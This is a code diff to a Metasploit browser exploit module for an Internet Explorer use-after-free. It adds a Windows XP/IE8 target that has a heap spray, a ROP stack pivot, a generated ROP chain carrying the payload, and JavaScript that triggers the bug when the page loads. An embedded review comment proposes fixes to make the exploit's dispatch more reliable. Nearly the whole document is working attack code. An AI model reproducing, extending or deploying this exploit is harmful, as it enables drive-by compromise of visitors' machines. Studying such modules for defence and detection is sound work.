@@ -38,8 +38,9 @@ def initialize(info={})
3838 'License' => MSF_LICENSE ,
3939 'Author' =>
4040 [
41- 'Unknown' , # Exploit in the wild first spotted in Japan
42- 'sinn3r' # Metasploit (thx binjo for the heads up!)
41+ 'Unknown' , # Exploit in the wild first spotted in Japan
42+ 'sinn3r' , # Metasploit (thx binjo for the heads up!)
43+ 'Rich Lundeen' # IE8 windows xp
4344 ] ,
4445 'References' =>
4546 [
@@ -53,16 +54,29 @@ def initialize(info={})
5354 'Platform' => 'win' ,
5455 'BrowserRequirements' =>
5556 {
56- :source => /script/i ,
57- :os_name => OperatingSystems ::WINDOWS ,
58- :ua_name => HttpClients ::IE ,
59- :ua_ver => "9.0" ,
60- :os_flavor => "7" ,
61- :office => /2007|2010/
57+ :source => /script/i
6258 } ,
6359 'Targets' =>
6460 [
65- [ 'Automatic' , { } ]
61+ [ 'Automatic' , { } ] ,
62+ [
63+ 'Windows 7 with Office 2007|2010' ,
64+ {
65+ :os_name => /win/i ,
66+ :ua_name => OperatingSystems ::WINDOWS ,
67+ :ua_ver => "9.0" ,
68+ :os_flavor => "7" ,
69+ :office => /2007|2010/
70+ }
71+ ] ,
72+ [
73+ 'Windows XP with IE 8' ,
74+ {
75+ :os_name => "Windows XP" ,
76+ :ua_name => HttpClients ::IE ,
77+ :ua_ver => "8.0"
78+ }
79+ ]
6680 ] ,
6781 'Payload' =>
6882 {
@@ -116,7 +130,7 @@ def get_payload(target_info)
116130 p
117131 end
118132
119- def get_exploit_html ( cli , target_info )
133+ def get_exploit_html_ie9 ( cli , target_info )
120134 gadgets = { }
121135 case target_info [ :office ]
122136 when '2007'
@@ -238,9 +252,75 @@ def get_exploit_html(cli, target_info)
238252 |
239253 end
240254
255+ def get_exploit_html_ie8 ( cli , target_info )
256+ code = payload . encoded
257+
258+ #address containing our heap spray is 0x20302020
259+ spray_addr = "\\ u2024\\ u2030"
260+
261+ #size to fill after free is 0x50
262+ free_fill = spray_addr + "\\ u2424" * ( ( ( 0x50 -1 ) /2 ) -2 )
263+
264+ rop = [
265+ 0x77c3868a , # stack pivot in msvcrt || xchg eax, esp ; rcr dword [ebx-0x75], 0xFFFFFFC1 ; pop ebp ; ret ;
266+ 0x20302020 # pointer to stack pivot
267+ ] . pack ( "V*" )
268+
269+ rop << generate_rop_payload ( 'msvcrt' , code , { 'target' => 'WINDOWS XP SP3' } ) << code
270+
271+ js_rop = Rex ::Text . to_unescape ( rop )
272+
273+ %Q|
274+ <html>
275+ <script>
276+
277+ #{ js_property_spray }
278+
279+ tt = new Array(30);
280+
281+ function trigger()
282+ {
283+ var id_0 = document.createElement("sup");
284+ var id_1 = document.createElement("audio");
285+
286+ document.body.appendChild(id_0);
287+ document.body.appendChild(id_1);
288+ id_1.applyElement(id_0);
289+
290+ id_0.onlosecapture=function(e) {
291+ document.write("");
292+
293+ for(i = 0; i < tt.length; i++) {
294+ tt[i] = document.createElement('div');
295+ tt[i].className ="#{ free_fill } ";
296+ }
297+
298+ var s = unescape("#{ js_rop } ");
299+ sprayHeap({shellcode:s});
300+ }
301+
302+ id_0['outerText']="";
303+ id_0.setCapture();
304+ id_1.setCapture();
305+ }
306+
307+ window.onload = function() {
308+ trigger();
309+ }
310+ </script>
311+ |
312+
313+ end
314+
241315 def on_request_exploit ( cli , request , target_info )
242- html = get_exploit_html ( cli , target_info )
316+ case target_info [ :ua_ver ]
317+ when "8.0"
318+ html = get_exploit_html_ie8 ( cli , target_info )
319+ when "9.0"
320+ html = get_exploit_html_ie9 ( cli , target_info )
321+ end
243322 send_response ( cli , html , { 'Content-Type' => 'text/html' , 'Cache-Control' => 'no-cache' } )
323+
244324 end
245325
246326end
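Review bot: The new `case target_info[:ua_ver]` in on_request_exploit has no `else`, so a request whose `:ua_ver` is neither "8.0" nor "9.0" falls through with `html` still nil and that nil is handed to `send_response` as the body; add an `else` that ends the request cleanly, e.g. `else return send_not_found(cli)`, or at minimum `else return`. The dispatch relies on the target table in the earlier hunk, where the Win7 entry now reads `:ua_name => OperatingSystems::WINDOWS` next to `:os_name => /win/i`, while the line it replaced used `HttpClients::IE` for `:ua_name` and the XP entry still does; that looks like a copy error and should be confirmed against the BrowserExploitServer matching rules. A one-line comment above the `case`, `# ua_ver is matched verbatim; only the two explicit targets are served`, would make the intended fall-through explicit.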
@@ -258,6 +338,13 @@ def on_request_exploit(cli, request, target_info)
258338 FileVersion: 2.05.50727.4039 (QFE.050727-4000)
259339
260340mshtml.dll
341+
342+ WinXP IE8 DLL info:
343+ ProductVersion: 8.0.6001.18702
344+ FileVersion: 8.0.6001.18702
345+ FileDescription: Microsoft (R) HTML Viewer
346+
347+ Win7 IE9 DLL info:
261348 ProductVersion: 9.00.8112.16446
262349 FileVersion: 9.00.8112.16446 (WIN7_IE9_GDR.120517-1400)
263350 FileDescription: Microsoft (R) HTML Viewer